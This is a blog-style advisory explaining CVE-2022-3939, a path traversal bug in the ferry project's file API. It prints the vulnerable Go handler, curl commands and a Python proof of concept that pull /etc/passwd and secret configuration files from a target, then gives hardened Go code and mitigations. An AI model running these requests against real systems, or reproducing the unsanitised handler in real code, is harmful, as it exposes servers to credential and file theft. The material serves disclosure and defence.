Summary

*CVE-2022-3939* is a critical security vulnerability discovered in the lanyulei ferry project. This flaw allows an attacker to access sensitive files on the server by exploiting the API in a way the original developers did not intend. In this detailed but easy-to-understand guide, we will explain what this vulnerability is, how it works, show you example exploit code, and list ways to protect affected systems.

What is Lanyulei Ferry?

Lanyulei ferry is an open-source project designed to provide file-sharing APIs. It is often used by organizations looking for a fast, simple way to transfer files between systems or users.

What’s the Issue?

This vulnerability exists in the apis/public/file.go file, specifically within an API responsible for handling file requests. The API fails to properly sanitize the file argument. Because of this mistake, attackers can use a technique called “path traversal” to read files outside the intended directory—potentially exposing passwords, API keys, or secret configurations.

Vulnerability ID: CVE-2022-3939

- VDB Record: VDB-213446

Component: API

- File: apis/public/file.go

How Bad is It?

- Critical Severity: Any remote attacker who can send requests to the API can read any file on the server filesystem that the application user can access.
- No Authentication Needed: The API can be accessed remotely, and the issue can be exploited without login credentials.
- Real-World Impact: Imagine an attacker stealing the configuration or database password file. Your private internal files could be exposed to the public internet!

The vulnerable endpoint looks roughly like this (simplified for clarity):

// apis/public/file.go (simplified; the vulnerable version)
package main

import "net/http"

// GetFile serves whatever name the client supplies, concatenated onto the
// base directory with no validation at all: this is the path traversal bug.
func GetFile(w http.ResponseWriter, r *http.Request) {
    file := r.URL.Query().Get("file")
    http.ServeFile(w, r, "./public/files/"+file)
}

What’s the problem?
The file argument is appended directly to the file path with no checks at all. If a user requests file=report.pdf, everything is fine:

GET /api/file?file=report.pdf
Reads: ./public/files/report.pdf

But what if a hacker crafts this malicious request?

GET /api/file?file=../../../../etc/passwd
Reads: ./public/files/../../../../etc/passwd
Which resolves to /etc/passwd — a sensitive file on Unix systems!

Exploiting the Vulnerability

Because the application does not filter out directory traversal characters (../), malicious users can escape the intended folder and grab any readable file on the server.

Example Exploit Using Curl

curl "http://victim-server/api/file?file=../../../../etc/passwd"

This would return the contents of /etc/passwd if the server is running Linux or Unix.

Another example:

curl "http://victim-server/api/file?file=../../../../secret/config.yaml"

This could reveal secret credentials or keys.

Here’s a simple Python proof-of-concept for automating the exploit:

import requests

# The vulnerable endpoint and a traversal payload for a Unix host.
target = "http://victim-server/api/file"
payload = "../../../../etc/passwd"

# The "file" query parameter is passed through unchanged by the server.
r = requests.get(target, params={"file": payload})
print("Server Response:")
print(r.text)

Modify payload for any file you wish to retrieve.

1. Validate and Sanitize File Paths

Always validate and sanitize file paths provided by users. Here’s an improved approach in Go:

// apis/public/file.go (hardened version)
package main

import (
    "net/http"
    "path/filepath"
    "strings"
)

// Only allow files inside ./public/files/
const baseDir = "./public/files/"

func GetFile(w http.ResponseWriter, r *http.Request) {
    file := r.URL.Query().Get("file")
    safePath := filepath.Clean(file)

    // Join cleans the combined path, so any "../" segments are resolved
    // before the containment check below runs.
    cleanBase := filepath.Clean(baseDir)
    fullPath := filepath.Join(cleanBase, safePath)

    // Require the result to sit strictly beneath the base directory.
    // Checking for cleanBase plus a separator (not just the bare prefix)
    // stops a sibling such as ./public/files2 from passing, and rejecting
    // the base itself avoids serving a directory listing.
    if fullPath == cleanBase || !strings.HasPrefix(fullPath, cleanBase+string(filepath.Separator)) {
        http.Error(w, "Invalid file path", http.StatusForbidden)
        return
    }

    http.ServeFile(w, r, fullPath)
}

2. Never Trust User Input

Reject file paths containing “..” or leading slashes.

3. Restrict API Access

If possible, protect the API with authentication and firewall rules so only trusted users can access it.
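To show how the containment check from the hardened handler and the "reject .. and leading slashes" rule behave on concrete inputs, here is an added stand-alone example (my code, not from the ferry project): a SafeJoin helper built on filepath.Rel, run over constructed names including the two traversal payloads above. The base directory and file names are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideBase is returned for any name that would escape baseDir.
var ErrOutsideBase = errors.New("requested path escapes the base directory")

// SafeJoin resolves a user-supplied name relative to baseDir and rejects
// anything that does not stay strictly beneath it. It relies on filepath.Rel
// rather than a bare prefix test, so a sibling such as public/files2 cannot
// slip past a check for the prefix "public/files". Symlinks inside baseDir are
// not resolved here; apply filepath.EvalSymlinks to the result if needed.
func SafeJoin(baseDir, name string) (string, error) {
	// Reject empty names, absolute names and embedded NUL bytes up front.
	if name == "" || strings.HasPrefix(name, "/") || filepath.IsAbs(name) || strings.ContainsRune(name, 0) {
		return "", ErrOutsideBase
	}
	absBase, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	// Join cleans the result, so "sub/../../etc/passwd" collapses before the check.
	candidate := filepath.Join(absBase, name)
	rel, err := filepath.Rel(absBase, candidate)
	if err != nil {
		return "", err
	}
	// rel is "." for the base itself (a directory, never served), and ".." or
	// "../x" for anything above or beside it.
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return candidate, nil
}

func main() {
	// Constructed sample names, including the traversal payloads from the write-up.
	for _, name := range []string{"report.pdf", "sub/../report.pdf", "../../../../etc/passwd", "../files2/x", "a/../..", ""} {
		p, err := SafeJoin("./public/files", name)
		fmt.Printf("%-26q -> %q, %v\n", name, p, err)
	}
}
```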

References and Further Reading

- VulDB CVE-2022-3939 Details
- Common path traversal advisory
- lanyulei/ferry GitHub (Check for official patches or updates)

Conclusion

CVE-2022-3939 is a serious path traversal vulnerability in the popular lanyulei ferry project. If you use ferry or any similar project with file access APIs, double-check for this bug. Keep your systems updated and follow the best security practices to keep your data safe.

If you find this guide helpful, share it with your tech team or anyone using ferry APIs. Stay safe!

Timeline

Published on: 11/11/2022 07:15:00 UTC
Last modified on: 11/15/2022 21:30:00 UTC